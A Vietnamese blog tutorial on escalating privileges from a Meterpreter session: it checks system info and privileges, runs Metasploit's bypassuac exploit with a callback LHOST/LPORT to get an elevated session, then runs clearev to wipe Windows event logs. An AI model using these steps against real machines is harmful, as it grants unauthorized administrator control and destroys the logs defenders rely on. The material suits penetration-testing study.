Pages

Nâng quyền và leo thang bậc quyền


Trường hợp giả định:

Sau khi ta có một session Meterpreter đang chạy trên mục tiêu, và việc tiếp theo ta cần làm là kiểm tra phiên bản hệ điều hành, cấu hình hệ thống và quyền hạn hiện có, và thực hành nâng quyền lên Administrator.
Vượt qua UAC và chiếm quyền Administrator.


Bắt đầu thực hành:

Kiểm tra phiên bản hệ điều hành:
meterpreter > sysinfo
Như ở trên ta thấy tên máy tính, phiên bản hệ điều hành, cấu trúc hệ điều hành, domain, ngôn ngữ hệ thống, và số lượng người dùng đang đăng nhập.
Tiếp theo là xem quyền hiện có và thiếp lập UAC có đang bật không? Ta có thể sử dụng post/windows/gather/win_privs từ msf > bằng lệnh use và exploit, tuy nhiên phải thiết lập tham số SESSION.
Ở đây, ta có thể chạy thẳng trên meterpreter > bằng lệnh run như sau:
meterpreter > run post/windows/gather/win_privs
Kết quả cho ta thấy được session đang không được chạy bằng quyền Administrator, không phải System và thiết lập UAC đang bật.
Có thể bạn đã biết (hoặc chưa) thì để chạy một ứng dụng với quyền Administrator trên Windows bạn phải vượt qua một bước xác nhận của UAC (User Account Control), vậy thì việc trước mắt ta cần phải làm đó là tắt UAC đi.
Tạm thời tắt meterpreter > đi, quay lại với msf >:
meterpreter > background
và hãy tìm kiếm một cái gì đó liên quan đến UAC mà ta có thể sử dụng được nào.
msf > search uac
Kết quả cho ta thấy chúng ta có 4 exploit dùng để bypass (vượt qua) bảo vệ của UAC, vậy thì hãy sử dụng nó thử xem nào. Mình sẽ chọn exploit/windows/local/bypassuac cơ bản nhất để thử trước, bạn có thể sử dụng lệnh info để xem thông tin của exploit trước khi lựa chọn sử dụng:
msf > use exploit/windows/local/bypassuac
Tiếp theo là xem và thiết lập các tham số. Rồi cho chạy exploit đó:
msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set SESSION <ID>
msf exploit(bypassuac) > exploit
Hãy thay <ID> lại thành ID của một session đang chạy.

Nếu kết quả thu được báo lỗi không thành công vì không thể nhận dữ liệu trên port 4444.
Vậy thì hãy thiết lập lại tham số LPORT bằng một giá trị khác và cho chạy lại. Ví dụ:
msf exploit(bypassuac) > set LHOST 172.16.100.3
msf exploit(bypassuac) > set LPORT 8080
msf exploit(bypassuac) > exploit
Lần này đã chạy thành công, ta hãy kiểm tra quyền hạn lại vẫn bằng post/windows/gather/win_privstrực tiếp trên meterpreter > session mới vừa được mở ra.
post/windows/gather/win_privs
post/windows/gather/win_privs
Lần này thì giá trị Is Admin là true, ta hãy thử dùng một vài lệnh mà cần quyền Administrator xem nào, ví dụ lệnh clearev dùng để xóa Event Log:
meterpreter > clearev
clear event log
clear event log
Vậy là ta đã thành công!!

tham khảo: thekalitools.com
thudinh Network and Security

No comments:

Adsense

Translate